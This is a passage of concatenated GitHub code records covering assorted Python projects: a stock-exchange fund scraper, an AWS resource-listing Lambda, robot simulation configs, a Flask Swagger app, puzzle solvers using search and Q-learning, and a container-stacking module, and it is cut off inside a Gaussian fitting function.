queryKeyWord = 'COMMON_SSE_FUND_FJLOF_NETVALUE_CX_S'\n elif query == 'scale':\n queryKeyWord = 'COMMON_SSE_FUND_FJLOF_SCALE_CX_S'\n\n url = 'http://query.sse.com.cn/commonQuery.do?' \\\n 'jsonCallBack=mycallback&' \\\n 'isPagination=true&' \\\n 'sqlId=' + queryKeyWord + '&' \\\n 'FILEDATE=' + queryDate + '&' \\\n 'pageHelp.pageSize=10000'\n\n valueText = getFromUrl(url)\n if(valueText):\n values = getJson(valueText)\n\n return values\n # logging.info(values)\n\ndef getFundValue(*date):\n values = queryFund(*date, query='value')\n funds = dict()\n for v in values:\n v['DATE'] = v['ASSESS_DATE']\n v['FUND_NAV'] = (float)(v['NAV'].replace(r',', ''))\n funds[v['FUND_CODE']] = v\n return funds\n\ndef getFundInfo(*date):\n values = queryFund(*date, query='scale')\n funds = dict()\n for v in values:\n v['DATE'] = datetime.strptime(v['TRADE_DATE'], '%Y%m%d').strftime('%Y-%m-%d')\n v['FUND_VOL'] = (int)((float)(v['INTERNAL_VOL'].replace(r',', '')) * 10000)\n funds[v['FUND_CODE']] = v\n return funds\n\n\ndef getFund(*date):\n\n fundInfo = getFundInfo(*date)\n fundValue = getFundValue(*date)\n\n fundIds = set((list)(fundInfo.keys()) + (list)(fundValue.keys()))\n funds = dict()\n\n for f in fundIds:\n fund = dict()\n fund['FUND_VOL'] = fund['FUND_NAV'] = 0\n if f in fundInfo:\n fund['FUND_DATE'] = fundInfo[f]['DATE']\n fund['FUND_VOL'] = fundInfo[f]['FUND_VOL']\n if f in fundValue:\n fund['FUND_NAV'] = fundValue[f]['FUND_NAV']\n funds[f] = fund\n\n return funds\n\n\nif __name__ == '__main__':\n [print(x) for x in getFund().items()]","repo_name":"changye/Stock","sub_path":"shFund.py","file_name":"shFund.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32882601451","text":"import json\nimport boto3\nimport sys\nimport os\n\n# Get list of any chargable active resources (EC2, RDS, volumes/snapshots, EIPs etc)\n# Check if they have an exclusion tag\n# Report both categories to SNS topic\n# Have switch function to allow stopping or even deleting stray resources\n# I test this on a box with python 3.7.10 so I guess run with that version\n\n# Can't seem to get global variables etc to work, makes for a messy way of setting the region\n# Also this isn't about the python, it's about the lambda... \n\ndef check_AMI():\n image_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n AMI=boto3.client('ec2', region_name=AWS_region )\n all_images=AMI.describe_images(Owners=['self'])\n for images in all_images['Images']:\n image_list=image_list + images['ImageId'] + \"\\t\" + images['CreationDate'] + '\\n ' \n return image_list\n\n\ndef check_snaps():\n snapshot_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n SNAPS=boto3.client('ec2', region_name=AWS_region )\n all_snaps=SNAPS.describe_snapshots(OwnerIds=['self'])\n for snapshot in all_snaps['Snapshots']:\n snapshot_list=snapshot_list + snapshot['SnapshotId'] + \"\\t\" + str(snapshot['StartTime']) + '\\n ' \n return snapshot_list\n\n\ndef check_RDS():\n instance_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n RDS=boto3.client('rds', region_name=AWS_region )\n\n all_instances=RDS.describe_db_instances()\n for instance in all_instances['DBInstances']:\n instance_list=instance_list + instance['DBInstanceIdentifier'] + \"\\t\" + instance['DBInstanceStatus'] + '\\n '\n return instance_list\n\n\n\ndef check_EC2():\n instance_list=\"\"\n AWS_region=os.environ['AWS_REGION']\n EC2=boto3.resource('ec2', region_name=AWS_region)\n all_instances=EC2.instances.all()\n\n for instance in all_instances:\n # print(f'Tags: {instance.tags.value}')\n instance_list=instance_list +instance.id + \"\\t\" + instance.state[\"Name\"] + '\\n '\n return instance_list \n\n\ndef send_SNS(subject,message):\n sns = boto3.client('sns')\n sns_arn=os.environ['MY_SNS_TOPIC_ARN']\n response = sns.publish(\n TopicArn=sns_arn,\n Message=message,\n Subject=subject,\n )\n\n\ndef lambda_handler(event, context):\n EC2_list=\"\"\n RDS_list=\"\"\n AMI_list=\"\"\n snap_list=\"\"\n action=event['Action']\n if (action ==\"List\"):\n EC2_list=check_EC2()\n RDS_list=check_RDS()\n AMI_list=check_AMI()\n print (\"AMI LIST: \\n\" + AMI_list)\n SNAP_list=check_snaps()\n send_SNS(\"Running Resources:\",\"EC2s:\\n\" + EC2_list + \"\\nRDS Instances:\\n\" + RDS_list + \"\\nAMIs\\n\" + AMI_list+ \"\\nSnapshots:\\n\" + SNAP_list)\n elif (action == \"Debug\"):\n ret_str=(\"PARAMETERS:\\n\" + json.dumps(event) + \"\\nMY_SNS_TOPIC_ARN: \")\n ret_str=(ret_str + \"VARIABLES:\\n\" + os.environ['MY_SNS_TOPIC_ARN'] + \"\\n\" + os.environ['AWS_REGION'])\n send_SNS(\"Debug info\", ret_str)\n else:\n send_SNS(\"ERROR\", json.dumps(event))\n\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(EC2_list + \"\\n\" + RDS_list)\n }\n\n","repo_name":"mikayp1967/lambda","sub_path":"running-resources/list-all.py","file_name":"list-all.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20525128877","text":"# Default config file for all envs. Other envs will use these values unless they are specifically overwritten\n# with their own config files.\n\n# note: as a rule of thumb, these values should be as reusable as possible between envs, while values that\n# are expected to change between each env should be actual class parameters.\n\nimport os\nimport numpy as np\n\nimport manipulator_learning\n\n\n# generic defaults for all envs\nMAN_LEARN_DIR = os.path.dirname(manipulator_learning.__file__)\nMODEL_BASE = MAN_LEARN_DIR + '/sim'\nROBOT_URDF_BASE = MODEL_BASE + '/robots'\nOBJECT_URDF_BASE = MODEL_BASE + '/objects/models/urdf'\n\nALL_DEF_CONFIG = dict(\n # sim\n time_step=.01,\n render_opengl_gui=False,\n\n # cam\n debug_cam_params=(.20, -.41, .59, 1.6, -29.4, 156.),\n render_shadows=True,\n render_ground_plane=True,\n\n # arm\n gripper_default_close=False,\n gripper_force=10,\n max_gripper_vel=0.8,\n init_gripper_random_lim=None,\n\n # base\n random_base_theta_bounds=(0, 0),\n base_random_lim=((0, 0, 0), (0, 0, 0)),\n base_pose_from_workspace_center=True,\n cam_workspace_distance=.3,\n\n # objects\n object_urdf_root=OBJECT_URDF_BASE,\n block_style='',\n block_random_lim=[],\n init_block_pos=[],\n init_rod_pos=None,\n rod_random_lim=None,\n block_colors=None,\n\n # task\n goal_type=None,\n goal_pos=None\n)\n\n# task-specific params\nXYZ_CONFIG = dict(\n valid_trans_dof=[1, 1, 1],\n valid_rot_dof=[0, 0, 0]\n)\n\nLIFT_DEFAULTS = dict(\n block_random_lim=((0.25, 0.25)),\n goal_type=None,\n)\n\nMULTIVIEW_DEFS = dict(\n random_base_theta_bounds=(-3 * np.pi / 16, np.pi / 16),\n base_random_lim=((.02, .02, .002), (0, 0, .02))\n)\n","repo_name":"utiasSTARS/manipulator-learning","sub_path":"manipulator_learning/sim/envs/configs/all_default.py","file_name":"all_default.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"33321741319","text":"from flasgger import Swagger\nfrom flask import Flask\n\nfrom noticias_ner.api.endpoints import ner_api\n\n\ndef __criar_especificacao_swagger():\n template = {\n \"info\": {\n \"title\": \"RiskData NER - Extrator de entidades mencionadas em dados textuais\",\n \"description\": \"REST web service responsável por expor funcionalidades de extração de entidades em dados \"\n \"textuais do RiskData NER.\",\n \"contact\": {\n \"responsibleOrganization\": \"TCU / SecexSaúde / NTDI\",\n \"responsibleDeveloper\": \"Monique Monteiro\",\n \"email\": \"moniquebm@tcu.gov.br\",\n },\n \"version\": \"0.0.1\"\n },\n }\n Swagger(app, template=template)\n\n\napp = Flask(__name__)\n\napp.register_blueprint(ner_api)\n__criar_especificacao_swagger()\n","repo_name":"SecexSaudeTCU/noticias_ner","sub_path":"noticias_ner/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"pt","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"4666502806","text":"\"\"\"\n很久以前写的n杯倒水问题\n\"\"\"\n\n\nfrom itertools import product\nfrom copy import deepcopy\n\nclass Node(object):\n def __init__(self, status, pre=None):\n self.status = status\n self.pre = pre\n\n\ndef get_steps(cup_volume, water, objective, deepth):\n operation = [(x, y) for x, y in product(list(range(len(cup_volume))), repeat=2) if x != y]\n cup_status = [0]*(len(cup_volume))\n if water > sum(cup_volume):\n raise \"水太多装不下了啦\"\n for i, volume in enumerate(cup_volume):\n if water <= 0:\n break\n if water <= volume:\n cup_status[i] = water\n water = 0\n else:\n cup_status[i] = volume\n water -= volume\n head = Node(cup_status)\n status_set = {str(cup_status)}\n status_record = [[head]] + [[]]*deepth\n for i in range(deepth):\n for node in status_record[i]:\n cup_status = node.status\n for x, y in operation:\n next_cup_status = deepcopy(cup_status)\n residue_water = cup_volume[y] - cup_status[y]\n if cup_status[x] >= residue_water:\n next_cup_status[x] = cup_status[x] - residue_water\n next_cup_status[y] = cup_volume[y]\n else:\n next_cup_status[y] = cup_status[y] + cup_status[x]\n next_cup_status[x] = 0\n cur_node = Node(next_cup_status, pre=node)\n if objective in next_cup_status:\n return cur_node\n if str(next_cup_status) not in status_set:\n status_record[i+1].append(cur_node)\n status_set.add(str(next_cup_status))\n return False\n\n\ndef find_method(cup_volume, water, objective, deepth):\n last_node = get_steps(cup_volume, water, objective, deepth)\n if last_node:\n result = []\n p = last_node\n while True:\n cup_status = p.status\n result.append(cup_status)\n p = p.pre\n if p is None:\n break\n print(result[::-1])\n else:\n print('{}步内无解'.format(deepth))\n\n\nfind_method([10, 5, 6], 11, 8, 10)","repo_name":"mikuh/some_algorithm","sub_path":"pour_water.py","file_name":"pour_water.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24160776855","text":"import random\nimport logging\nimport sys\nimport os\nimport math\nfrom collections import deque\nimport argparse\nimport pickle\n\n\nclass QLearning:\n def __init__(self, num_actions=4, learning_rate=0.1, discount_factor=0.9):\n self.matrix = {}\n self.num_actions = num_actions\n self.learning_rate = learning_rate\n self.discount_factor = discount_factor\n\n def update(self, state, action, reward, next_state):\n if state not in self.matrix:\n self.matrix[state] = [0] * self.num_actions\n if next_state not in self.matrix:\n self.matrix[next_state] = [0] * self.num_actions\n\n q_s_a = self.matrix[state][action]\n max_q_next = max(self.matrix[next_state])\n alpha = self.learning_rate\n r = reward\n gamma = self.discount_factor\n self.matrix[state][action] = (1 - alpha)*q_s_a + alpha*(r + gamma*max_q_next)\n\n\nclass Puzzle:\n def __init__(self, init_state=(7, 2, 4, 5, 0, 6, 8, 3, 1), size=3, blank_pos=None):\n\n # State Definition\n # A puzzle state like this\n # a b c\n # d e f\n # g h i\n # will be flattend to 'abcdefghi' to represent the state.\n\n # Assume init_state and size make sense\n self.state = init_state\n self.size = size\n self.blank_pos = self.idx_to_pos(self.state.index(0)) if blank_pos is None else blank_pos\n\n @property\n def goal_state(self):\n return (0, 1, 2, 3, 4, 5, 6, 7, 8)\n\n def idx_to_pos(self, idx):\n return idx // self.size, idx % self.size\n\n def pos_to_idx(self, row, col):\n return row * self.size + col\n\n def next_states_actions(self):\n r, c = self.blank_pos\n ret = []\n # Up\n if r > 0:\n # swap the blank with the piece on top\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r - 1, c)]\n state[self.pos_to_idx(r - 1, c)] = 0\n p = Puzzle(tuple(state), self.size, (r - 1, c))\n ret.append((p, 0))\n # Right\n if c < self.size - 1:\n # swap the blank with the piece on the right\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c + 1)]\n state[self.pos_to_idx(r, c + 1)] = 0\n p = Puzzle(tuple(state), self.size, (r, c + 1))\n ret.append((p, 1))\n # Down\n if r < self.size - 1:\n # swap the blank with the piece below\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r + 1, c)]\n state[self.pos_to_idx(r + 1, c)] = 0\n p = Puzzle(tuple(state), self.size, (r + 1, c))\n ret.append((p, 2))\n # Left\n if c > 0:\n # swap the blank with the piece on the left\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c - 1)]\n state[self.pos_to_idx(r, c - 1)] = 0\n p = Puzzle(tuple(state), self.size, (r, c - 1))\n ret.append((p, 3))\n return ret\n\n def move(self, action):\n # assume action is legal\n r, c = self.blank_pos\n if action == 0:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r - 1, c)]\n state[self.pos_to_idx(r - 1, c)] = 0\n self.blank_pos = r - 1, c\n self.state = tuple(state)\n elif action == 1:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c + 1)]\n state[self.pos_to_idx(r, c + 1)] = 0\n self.blank_pos = r, c + 1\n self.state = tuple(state)\n elif action == 2:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r + 1, c)]\n state[self.pos_to_idx(r + 1, c)] = 0\n self.blank_pos = r + 1, c\n self.state = tuple(state)\n elif action == 3:\n state = list(self.state)\n state[self.pos_to_idx(r, c)] = self.state[self.pos_to_idx(r, c - 1)]\n state[self.pos_to_idx(r, c - 1)] = 0\n self.blank_pos = r, c - 1\n self.state = tuple(state)\n\n def reward(self):\n return 100000 if self.has_won() else -0.1\n\n def has_won(self):\n return self.state == self.goal_state\n\n def __repr__(self):\n return f'{self.state}'\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--episode', type=int, help='Number of episodes to train. Default: 30000.')\n parser.add_argument('-l', '--load', help='Load a pretrained Q-Matrix.', action='store_true')\n args = parser.parse_args()\n\n # Logger setup\n log_file_path = 'result.txt'\n try:\n os.remove(log_file_path)\n except OSError:\n pass\n log_file = logging.FileHandler(log_file_path)\n stdout = logging.StreamHandler(sys.stdout)\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n logger.addHandler(log_file)\n logger.addHandler(stdout)\n\n if args.load:\n try:\n file_name = input('Specify file to load: ')\n with open(file_name, 'rb') as f:\n q = pickle.load(f)\n logger.debug(f'Successfully loaded \\'{file_name}\\'')\n except OSError:\n logger.debug('Failed to load Q-Matrix')\n logger.debug('Empty matrix employed\\n')\n q = QLearning()\n else:\n q = QLearning()\n\n if args.episode is None:\n total_episode = 100000\n else:\n total_episode = args.episode\n\n if total_episode == 0:\n logger.debug(f'Skip training...')\n else:\n logger.debug(f'Start training {total_episode} episodes...')\n\n # For displaying average iteration count for last 100 episodes\n last_hundred_iters = deque()\n last_hundred_iter_sum = 0\n\n # Run episodes\n for episode in range(total_episode):\n # Reset puzzle\n p = Puzzle()\n i = 0\n score = 0\n\n # Initial exploit chance is 30%\n initial_exploit_chance = 0.3\n # It grows linearly reaching 80% at the last episode\n exploit_chance = initial_exploit_chance + (0.8 - initial_exploit_chance) * episode / total_episode\n\n while not p.has_won():\n i += 1\n next_states_actions = p.next_states_actions()\n\n # Exploit if possible and lucky\n if p.state in q.matrix and random.uniform(0, 1) <= exploit_chance:\n best_action = None\n best_next_p = None\n best_q = -math.inf\n for next_p, action in next_states_actions:\n if best_q < q.matrix[p.state][action]:\n best_q = q.matrix[p.state][action]\n best_next_p, best_action = next_p, action\n next_p, action = best_next_p, best_action\n # Explore otherwise\n else:\n random.shuffle(next_states_actions)\n next_p, action = next_states_actions[0]\n reward = next_p.reward()\n score += reward\n q.update(p.state, action, reward, next_p.state)\n p = next_p\n\n # Housekeeping for last 100 episodes avg iterations\n if episode >= 100:\n last_hundred_iter_sum -= last_hundred_iters.popleft()\n last_hundred_iters.append(i)\n last_hundred_iter_sum += i\n avg = last_hundred_iter_sum / (100 if episode>=100 else episode + 1)\n\n logger.debug(f'Episode #{episode + 1} ended in {i} moves. Score={score}. Q-Matrix Size={len(q.matrix)}. Avg moves of last 100 eps: {avg}')\n\n logger.debug('\\nTraining Complete')\n logger.debug('Save trained Q-Matrix? (y/n)')\n if input() == 'y':\n try:\n file_name = input('Save as: ')\n with open(file_name, 'wb') as f:\n pickle.dump(q, f)\n logger.debug(f'Successfully saved Q-Matrix as \\'{file_name}\\'')\n except OSError:\n logger.debug('Failed to save Q-Matrix')\n\n # Solve puzzle in question\n logger.debug('\\nSolving puzzle in question...\\n')\n p = Puzzle()\n i = 0\n while not p.has_won():\n i += 1\n logger.debug(f'Move #{i}:')\n logger.debug(f'State before move: {p}')\n logger.debug(f'Q matrix for current state: {q.matrix[p.state]}')\n action = q.matrix[p.state].index(max(q.matrix[p.state]))\n logger.debug(f'Choosen action: {action}')\n p.move(action)\n logger.debug(f'State after move: {p}\\n')\n logger.debug(f'Solve with {i} moves.')\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"jiyolla/IEE4122-optimization-in-AI","sub_path":"HW2/sliding_puzzle.py","file_name":"sliding_puzzle.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28782511514","text":"import math\nfrom queue import PriorityQueue\nfrom typing import Tuple, Set, Optional\n\nfrom main.model.dataclass import Container, StackLocation, StackTierLocation\n\nfrom main.model.batch.realizedBatch import RealizedBatch\nfrom main.model.dataclass.block import Block\nfrom main.model.dataclass.terminal import Terminal\nfrom main.model.noSolutionError import NoSolutionError\nfrom main.model.util.prioritizedItem import PrioritizedItem\n\n\ndef terminal_unique_outcomes(terminal: Terminal, batch: RealizedBatch) -> Set[Tuple[Terminal, int]]:\n if batch.length() == 0:\n return {(terminal, 0)}\n if batch.inbound:\n return _unique_inbound_outcomes(terminal, batch)\n else:\n t = terminal.reveal_order(batch.containers)\n return _unique_outbound_outcomes(t, batch)\n\n\ndef _unique_inbound_outcomes(initial_terminal: Terminal, batch: RealizedBatch) -> Set[Tuple[Terminal, int]]:\n # q = ((-i, reshuffles)), term)\n q = PriorityQueue()\n q.put(PrioritizedItem((0, 0), initial_terminal))\n abstract_added = set()\n result = set()\n while not q.empty():\n item = q.get(block=False)\n (i, reshuffles) = item.priority\n i = -i\n terminal = item.item\n\n # check if this is end state\n if i == batch.length():\n result.add((terminal, reshuffles))\n else:\n # not yet explored, need to add children to queue\n current_container = batch.containers[i]\n store_outcomes = store_locations(terminal, current_container, None)\n for new_term in store_outcomes:\n\n new_term_abstracted = new_term.abstract()\n if new_term_abstracted not in abstract_added:\n new_i = i + 1\n abstract_added.add(new_term_abstracted)\n q.put(PrioritizedItem((-new_i, reshuffles), new_term))\n if len(result) == 0:\n raise NoSolutionError(\"Could not find suitable solutions for batch: {}\\n terminal:\\n{}\"\n .format(batch, initial_terminal))\n return result\n\n\ndef _unique_outbound_outcomes(initial_terminal: Terminal, batch: RealizedBatch) \\\n -> Set[Tuple[Terminal, int]]:\n # q = ((-i, reshuffles)), term)\n q = PriorityQueue()\n q.put(PrioritizedItem((0, 0), initial_terminal))\n abstract_added = set()\n result = set()\n min_reshuffles = math.inf\n while not q.empty():\n item = q.get(block=False)\n (i, reshuffles) = item.priority\n i = -i\n terminal = item.item\n\n # if reshuffles is bigger than the current min reshuffles, disregard this option\n if reshuffles > min_reshuffles:\n continue\n\n # check if this is end state\n if i == batch.length():\n min_reshuffles = reshuffles\n result.add((terminal, reshuffles))\n else:\n # not yet explored, need to add children to queue\n current_container = batch.containers[i]\n # store_outcomes = __store_locations(terminal, current_container, None)\n handling_outcomes, is_reshuffle = handle_outbound_container(terminal, current_container)\n new_i = i + int(not is_reshuffle)\n new_reshuffles = reshuffles + int(is_reshuffle)\n for new_term in handling_outcomes:\n new_term_abstracted = new_term.abstract()\n if new_term_abstracted not in abstract_added:\n abstract_added.add(new_term_abstracted)\n q.put(PrioritizedItem((-new_i, new_reshuffles), new_term))\n if len(result) == 0:\n raise NoSolutionError(\"Could not find suitable solutions for batch: {}\\n terminal:\\n{}\"\n .format(batch, initial_terminal))\n return result\n\n\ndef handle_outbound_container(terminal: Terminal, container: Container) -> Tuple[Set[Terminal], bool]:\n current_stack_tier_location = terminal.container_location(container)\n blocking_containers = terminal.blocking_containers(current_stack_tier_location)\n\n if len(blocking_containers) > 0:\n blocking_container_location = terminal.container_location(blocking_containers[0])\n term, blocking_container = terminal.retrieve_container(blocking_container_location[:2])\n reshuffle_outcomes = store_locations(term, blocking_container, current_stack_tier_location)\n return reshuffle_outcomes, True\n else:\n new_terminal, retrieved_container = terminal.retrieve_container(current_stack_tier_location[:-1])\n return {new_terminal}, False\n\n\ndef store_locations(terminal: Terminal, container: Container,\n exclude_target_stack_tier_location: Optional[StackTierLocation]) \\\n -> Set[Terminal]:\n # max_stack_height = terminal.max_height\n result = set()\n blocks_visited = set()\n\n for block_index in range(terminal.nr_blocks()):\n block = terminal.blocks[block_index]\n if block not in blocks_visited:\n blocks_visited.add(block)\n for stack_index in range(len(block.stacks)):\n stack_location = (block_index, stack_index)\n # check if container may be placed in this location\n if valid_store_location(terminal, stack_location, exclude_target_stack_tier_location):\n new_term = terminal.store_container((block_index, stack_index), container)\n result.add(new_term)\n\n return result\n\n\n\n\n\ndef valid_store_location(terminal: Terminal,\n stack_location: StackLocation,\n target_stack_tier_location: Optional[StackTierLocation]):\n # stack is not full\n max_stack_height = terminal.max_height\n non_full = terminal.stack_height(stack_location) < max_stack_height\n\n if not non_full:\n return False\n\n # a container may not be stored when the target container is located in the same stack\n if target_stack_tier_location is not None and stack_location == target_stack_tier_location[:-1]:\n return False\n\n # if bay is empty, stack_location must be in the middle, otherwise must be against a neighbouring\n if not correct_bay_location(terminal, stack_location):\n return False\n\n # stack must be reachable\n if not _reachable(terminal.blocks[stack_location[0]], stack_location[1]):\n return False\n\n # if target stack tier is supplied, it is not allowed to store a container below the diagonal of the target container\n return below_diagonal(terminal, stack_location, target_stack_tier_location)\n\n\ndef correct_bay_location(terminal: Terminal, stack_location: StackLocation):\n block = terminal.blocks[stack_location[0]]\n if block.two_way:\n return _correct_bay_location_two_way(block, stack_location)\n else:\n return _correct_bay_location_one_way(block, stack_location)\n\n\ndef _correct_bay_location_one_way(block: Block, stack_location: StackLocation):\n nr_stacks = len(block.stacks)\n # if bay is empty, must be placed all the way to the right\n if all_empty_in_range(block, range(nr_stacks)):\n return stack_location[1] == nr_stacks-1\n\n # if stack already has a container placed on it, it is allowed to build on top of it\n if block.stacks[stack_location[1]].height() > 0:\n return True\n\n # if there exist an empty stack to the right of the given stack, it is not a valid position\n if exist_empty_in_range(block, range(stack_location[1]+1)):\n return False\n\n # if above checks hold, it is a valid location according to this rule\n return True\n\n\ndef _correct_bay_location_two_way(block: Block, stack_location: StackLocation):\n nr_stacks = len(block.stacks)\n stack_index = stack_location[1]\n # if bay is emtpy, must be placed in the middle\n if all_empty_in_range(block, range(nr_stacks)):\n return nr_stacks <= 2 or len(block.stacks) // 2 == stack_location[1]\n\n # if stack already has a container placed on it, it is allowed to build on top of it\n if block.stacks[stack_index].height() > 0:\n return True\n\n # direct neighbour stack must not be empty and other side must all be empty\n # right neighbour, left empty:\n right_neighbour = has_container(block, stack_index+1) and all_empty_in_range(block, range(stack_index))\n\n # left neighbour, right empty:\n return right_neighbour or (has_container(block, stack_index-1) and all_empty_in_range(block, range(stack_index+1, nr_stacks)))\n\n\ndef below_diagonal(terminal: Terminal, stack_location: StackLocation, target_stack_tier: Optional[StackTierLocation]):\n # if target stack tier is None, the check on diagonal is not needed\n if target_stack_tier is None:\n return True\n\n # if bays are different, the check on diagonal is not needed\n if stack_location[0] != target_stack_tier[0]:\n return True\n\n block = terminal.blocks[stack_location[0]]\n target_tier = target_stack_tier[2]\n target_stack_index = target_stack_tier[1]\n stack_index = stack_location[1]\n stack_distance = abs(target_stack_index - stack_index)\n\n if stack_index < target_stack_index:\n # target is on the right, thus needs to be below diagonal\n diagonal = (block.stacks[stack_index].height()) < (target_tier - stack_distance) and _reachable_left(block, stack_index)\n else:\n # target is on the left, thus needs to be above diagonal\n diagonal = (block.stacks[stack_index].height()) > (target_tier + stack_distance) and _reachable_left(block, stack_index)\n\n if block.two_way and not diagonal:\n if stack_index < target_stack_index:\n # target is on the left, thus needs to be above diagonal\n diagonal = (block.stacks[stack_index].height()) > (target_tier + stack_distance) and _reachable_right(block, stack_index)\n else:\n # target is on the right, thus needs to be below diagonal\n diagonal = (block.stacks[stack_index].height()) < (target_tier - stack_distance) and _reachable_right(block, stack_index)\n\n return diagonal\n\n\n\ndef exist_empty_in_range(block: Block, iterator):\n for stack_index in iterator:\n stack = block.stacks[stack_index]\n if stack.height() == 0:\n return True\n return False\n\n\ndef all_empty_in_range(block: Block, iterator):\n for stack_index in iterator:\n stack = block.stacks[stack_index]\n if stack.height() > 0:\n return False\n return True\n\n\ndef has_container(block: Block, stack_index: int):\n in_range = 0 <= stack_index < len(block.stacks)\n return in_range and block.stacks[stack_index].height() > 0\n\n\ndef _reachable_right(block: Block, stack_location: int):\n return block.two_way and _reachable_base(block, stack_location, range(stack_location + 1, len(block.stacks)))\n\n\ndef _reachable_left(block: Block, stack_location: int):\n return _reachable_base(block, stack_location, range(stack_location))\n\n\ndef _reachable_base(block: Block, stack_location: int, iterator):\n stack_height = block.stacks[stack_location].height()\n for i in iterator:\n stack_distance = abs(stack_location - i)\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n return False\n return True\n\n\ndef _reachable(block: Block, stack_location: int):\n stack_height = block.stacks[stack_location].height()\n reachable = True\n for i in range(stack_location):\n stack_distance = stack_location - i\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n reachable = False\n break\n\n if block.two_way and not reachable:\n reachable = True\n for i in range(stack_location + 1, len(block.stacks)):\n stack_distance = i - stack_location\n i_height = block.stacks[i].height()\n below_diagonal = i_height <= (stack_height - stack_distance) or i_height == 0\n if not below_diagonal:\n reachable = False\n break\n return reachable\n","repo_name":"boschma2702/ContainerStacking","sub_path":"main/model/dataclass/outcomes.py","file_name":"outcomes.py","file_ext":"py","file_size_in_byte":12097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16676519057","text":"#using with keyword while writing to a file, so that no need to close the file again & again\nimport os\nfileName = os.getcwd() + '\\\\withwrite.txt'\n\nwith open(fileName, 'w') as fo :\n fo.write('Hello Java\\n')\n fo.write('Hello Python\\n')\n\"\"\"\nHello Java\nHello Python\n\"\"\"\n\n#Attempt to read from or write to a closed file will throw ValueError Exception\n\"\"\"\nfo = open(fileName, 'r')\nfo.close()\nfo.read()\nValueError: I/O operation on closed file.\n\"\"\"\n\nlistFruits = ['Apple\\n', 'Orange\\n', 'Guava\\n', 'Mango\\n', 'Peach\\n']\nwith open(fileName, 'a') as fo :\n for f in listFruits :\n fo.write(f)\n\"\"\"\nHello Java\nHello Python\nApple\nOrange\nGuava\nMango\nPeach\n\"\"\"\n","repo_name":"vrrohan/Python100DaysOfCode","sub_path":"Day17-WorkingWithFiles/Py5-WriteFilesWith.py","file_name":"Py5-WriteFilesWith.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42130278067","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 10 19:58:08 2023\n\n@author: tauro\n\"\"\"\n\n\n# import python libraries\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport astropy.io.fits as fits\nimport astropy.wcs as wcs\nimport os \nimport time\n#from astropy.nddata import Cutout2D\nfrom scipy import ndimage\nimport astropy.constants as K\nimport astropy.units as u\nfrom astropy.cosmology import Planck15 as p15\nimport scipy.ndimage\nfrom lmfit import minimize, Parameters, report_fit\nfrom heapq import nlargest\nimport scipy.interpolate\nimport matplotlib.colors as mcolors\n\n\n\n#----------------------------------------------------------------------------\n\ndef residual(pars, x, p, data=None, sigma=None):\n ## Multi-gaussians model\n \n \n\n if p == 1:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n model = pars['amp_g1'] * np.exp(-argu1) + pars['C_g1']\n if p == 2:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2'] * np.exp(-argu2)) + pars['C_g2']\n if p == 3:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3'] * np.exp(-argu3)) + pars['C_g3']\n model1 = pars['C_g3'] + pars['amp_g1'] * np.exp(-argu1)\n model1z = pars['amp_g1'] * np.exp(-argu1)\n model2z = pars['amp_g3'] * np.exp(-argu3)\n if p == 4:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n model = (pars['amp_g1'] * 